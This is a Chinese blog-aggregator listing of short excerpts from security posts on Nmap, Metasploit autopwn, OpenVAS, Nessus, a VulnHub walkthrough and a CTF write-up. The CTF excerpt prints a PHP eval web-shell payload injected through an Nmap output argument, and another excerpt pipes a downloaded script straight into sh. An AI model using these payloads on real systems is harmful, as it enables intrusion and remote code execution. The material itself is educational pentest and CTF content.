servicepostgresqlstartmsfconsoledb_statusdb_nmap-sV-O-T4116.255.141.167loaddb_autopwn执行上面命令会发现提示不存在db_autopwn文件,/opt/metasploit/apps/pro/msf3/plugins/db_autopwn去http://download.csdn.net/detail/terryin
分类:
Web程序 时间:
2020-05-31 09:32:24
阅读次数:
148
靶机地址:这里 靶机难度:初级 靶机发布日期:12 Jul 2018 知识点: nmap端口扫描 弱口令登入 SUID提权 启动靶机,用nmap扫描获得靶机IP 192.168.133.164 扫描端口,开放了22,80,111端口 访问80端口,没有太大发现 在dirb发现了admin的目录 访问 ...
分类:
其他好文 时间:
2020-05-30 11:08:18
阅读次数:
68
和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o ...
分类:
其他好文 时间:
2020-05-29 19:49:08
阅读次数:
352
本篇简要介绍下Nmap NSE脚本的使用。 NSE脚本分类 nmap脚本主要分为以下13类,在扫描时可根据需要设置--script=[脚本] 来使用指定的脚本进行扫描检测任务。 auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/ ...
分类:
其他好文 时间:
2020-05-29 12:17:49
阅读次数:
107
1.nmap语法 -A 全面扫描/综合扫描 例如:nmap -A 127.0.0.1 扫描指定段 例如:nmap 127.0.0.1-200&nmap 127.0.0.1/24 2.Nmap 主机发现 -sP -sP ping扫描 例如:nmap -sP 127.0.0.1 -P0 -P0 无pin ...
分类:
其他好文 时间:
2020-05-26 01:34:50
阅读次数:
79
下载链接:https://nmap.org/download.html nc传输(一种网络的数据流重定向) nc所做的就是在两台电脑之间建立tcp或udp链接,并在两个端口之间传输数据流,是一种网络的数据流重定向 使用dd结合nc命令网络克隆磁盘分区 主机: dd if=/dev/vda | gzi ...
分类:
其他好文 时间:
2020-05-23 16:40:20
阅读次数:
95
拍摄于某工位 NMAP端口扫描工具使用 NMAP可以扫描主机的端口及对应的服务,操作系统版本等,以下对NMAP扫描端口和服务做简单介绍。 工具/原料 电脑 nmap 方法/步骤 在安装包中双击nmap-7.40-setup.exe进行安装,依次点击下一步即可。 安装完成后桌面会显示nmap图标。 打 ...
分类:
其他好文 时间:
2020-05-19 10:48:47
阅读次数:
385
nmap 报错问题解决configure: error: Neither flex nor lex was found. ...
分类:
系统相关 时间:
2020-05-19 00:28:07
阅读次数:
297
openvas的安装及使用 安装 安装前的准备: yum install -y wget bzip2 texlive net-tools alien gnutls-utils wget -q -O - https://www.atomicorp.com/installers/atomic | sh ...
分类:
其他好文 时间:
2020-05-18 20:29:51
阅读次数:
235
如何发现永恒之蓝? 利用漏洞之前,首先是要发现漏洞,那么我们在做测试的时候如何去发现漏洞呢?今天我给大家介绍一款开源免费的扫描工具Nessus。Nessus号称是世界上最流行的漏洞扫描程序,通常包括成千上万的最新的漏洞,各种各样的扫描选项,及易于使用的图形界面和有效的报告。在这里我们仅需要验证一台主 ...
分类:
其他好文 时间:
2020-05-18 14:20:56
阅读次数:
136